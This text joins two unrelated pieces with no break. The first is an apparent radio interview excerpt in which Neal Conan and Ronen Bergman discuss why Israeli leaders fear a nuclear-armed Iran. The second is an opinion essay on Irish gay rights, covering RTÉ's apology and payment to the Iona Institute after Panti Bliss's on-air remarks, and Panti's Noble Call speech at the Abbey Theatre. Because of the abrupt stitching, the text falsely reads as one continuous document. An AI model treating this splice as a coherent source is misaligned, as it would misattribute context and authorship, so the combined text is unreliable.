NEAL CONAN : Chris , thanks very much for the call . Israel itself possesses , what , 300 nuclear weapons we believe , maybe more ? Why does not deterrence work ? Israel , of course , would retaliate if Iran were to use a nuclear weapon . BERGMAN : I would assume that–oh , I know that most of Israel 's leaders do not believe that Iran is going to use nuclear weapons against Israel . The problem is not the nuclear threat . The Iranians are not stupid . They want to live… . And I think that most leaders , and me personally as well , see that there are only a few people who believe that Iran would be hesitant enough to–sorry , brutal enough and stupid enough to use nuclear weapon against Israel . The problem is that once Iran acquires this ability , it would change the balance of power in the Middle East . And a country that possesses nuclear weapon is a different country when it comes to support proxy jihadist movement . And these Israeli leaders afraid would significantly narrow down the variety of options from the point of view of Israel , just to quote one example coming from Minister of Defense Barak , when he said , just imagine–he told me in a meeting we had on the 13th of January in his house–said , just imagine , Ronen , that tomorrow we go into another war with Hezbollah in Lebanon like we did in 2006 , and this time we are determined to take them out . But Iran comes forward and say , to attack Hezbollah is like attacking Iran , and we threaten you with nuclear weaponry . Now , Minister of Defense Barak says it 's not necessarily that we would be threatened not to attack , and we would decide to cancel the war , but it would certainly make us think twice .
In other words , Israel 's position might be that an nuclear-armed Iran could make it harder to have future wars . That 's a very different discussion from the one we 're having now .
As Ireland moves away from its uneasy coalition with the Catholic church , the issue of gay rights in Ireland is gaining more traction . The upcoming same-sex marriage referendum has resulted in gay rights being discussed on Irish television . On the January 11 edition of the Saturday Night Show on RTÉ , Ireland 's national broadcaster , Rory O'Neill ( aka Ireland 's arguably most famous Drag Queen , Panti Bliss ) became the center of a national controversy over gay rights and homophobia in Ireland . During his live on-air interview with host Brendan O'Connor , O'Neill described a number of Irish journalists as well as a pressure group named the Iona Institute as homophobic in their views toward same-sex marriage .
The Iona Institute is a private lobby group , characterized by some as “ privileged people seeking to influence Irish law and seeking to impose their own personal religious views on people. ” They describe themselves as promoting “ the place of marriage and religion in society ” and have been actively pursuing an agenda against same-sex marriage , among other issues , since launching in 2007 . Iona has become increasingly vocal in recent months , however , following the announcement of the referendum . The Iona Institute is given a significant amount of time and attention by RTÉ studios , which is questionable considering the small scope they have as a small lobby group , albeit well funded . This anomaly is leaving some commentators to question why they are given such visibility on the national station .
Following O'Neill 's interview , members of the Iona Institute threatened legal action against RTÉ . This resulted in RTÉ initially taking the entire episode offline . The episode was eventually put back online , but with the “ offending ” part removed from the interview . Ireland does n't have the greatest track record when it comes to gay rights , and so we might expect for RTÉ 's decision to censor O'Neill to slip under the radar . But that 's not what happened . Instead , when RTÉ took the show recording offline , then publicly apologized and paid a sum of money to the Iona Institute when they threatened legal action against libel , a public backlash started immediately . RTÉ 's apology to Iona read :
On the Saturday Night Show on the 11th of January last , comments were made by a guest suggesting that the journalist and broadcaster John Waters , Breda O'Brien and some members of the Iona Institute are homophobic . These are not the views of RTÉ , and we would like to apologise for any upset or distress caused to the individuals named or identified . It is an important part of democratic debate that people must be able to hold dissenting views on controversial issues .
Many viewed this statement as a hypocritical stance , an attempt to guarantee open public debate through censorship . RTÉ , as a public broadcaster , receives 50 % of its funding through publicly paid license fees in exchange for maintaining a public service on their broadcasts . In 2012 , RTE received €180,894,000 through this license fee . And the fact that RTÉ awarded public money ( reportedly €85,000 ) to those in the Iona Institute who had threatened legal action fueled further outrage .
The Irish media has reported that over 100 people complained to the Broadcasting Authority of Ireland over RTÉ 's apology to the Iona Institute , with nearly ten times that number of complaints logged to RTÉ itself , one of which reads , “ RTÉ had so many other options here . But by cowing down to Iona…they 've reinforced the status quo that some people 's views matter more . ”
In reaction to this , Panti Bliss gave a speech known as a Noble Call following the final performance of The Risen People at the Abbey Theatre in Dublin . Each performance of this play has featured a Noble Call from a guest performer ; it is essentially a speech for someone in the public eye to use the stage to offer either a response to the play or to speak on a public issue .
The Abbey Theatre , also known as the National Theatre of Ireland , was established in 1904 by W.B . Yeats and Lady Augusta Gregory as part of the Irish Literary Revival . The Revival in Ireland was one of the country 's first attempts to solidify Gaelic heritage and Irish national identity in the face of colonization . The Abbey stage therefore has always been a place of debate and controversy . For Panti Bliss to take the stage there and make public the level of homophobia in Ireland today made for a powerful statement .
Panti 's speech focuses on the kinds of harassment a queer person can expect to get in Ireland . Panti explains that when the gay community experiences harassment , there can exist a desire in that moment to appear the same , to be “ just like everyone else ” to avoid the harassment . This “ shameful ” desire , as Panti describes it , comes from the same place as the harassment , the internal homophobia that exists in everyone in Ireland .
I do , it is true , believe that almost all of you are probably homophobes . But I 'm a homophobe . It would be incredible if we were n't . To grow up in a society that is overwhelmingly homophobic and to escape unscathed would be miraculous . So I do n't hate you because you are homophobic . I actually admire you . I admire you because most of you are only a bit homophobic . Which all things considered is pretty good going . But I do sometimes hate myself . I hate myself because I fucking check myself while standing at pedestrian crossings . And sometimes I hate you for doing that to me . [ 1 ]
Organizations like Iona feed off this homophobia , and push forward the idea that same-sex marriage will ruin traditional marriage and by extension , Irish society as we know it .
As we can see , progress has come slowly to Ireland . While the Fifth Amendment of the Constitution of Ireland removed the “ special position ” of the Roman Catholic Church in the 1970s , removing the residual Catholic morality out of state matters has been slow . Divorce was only legalized in Ireland in 1996 , and birth control was only made freely available in 1979 with the Health ( Family Planning ) Act ; homosexuality was only decriminalized in 1993 , and the law on abortion rights is only now being debated . The backlash against RTÉ , however , is a positive sign . Iona 's efforts will not turn back the clock ; many in the Irish public are already attempting to challenge their views about homosexuality . That 's what makes Panti 's honest account so incredibly powerful . While Panti may be “ too gay ” for some , we Irish are doing our best to unlearn our homophobia and move forward . We are holding our national platforms , as well as ourselves , to a higher standard .
_______________________________________
1. https : //docs.google.com/document/d/1ZgplK8Kyd2yA9cjJvn6S_KeLCoQoG28C0NGwkXMwpJc/edit
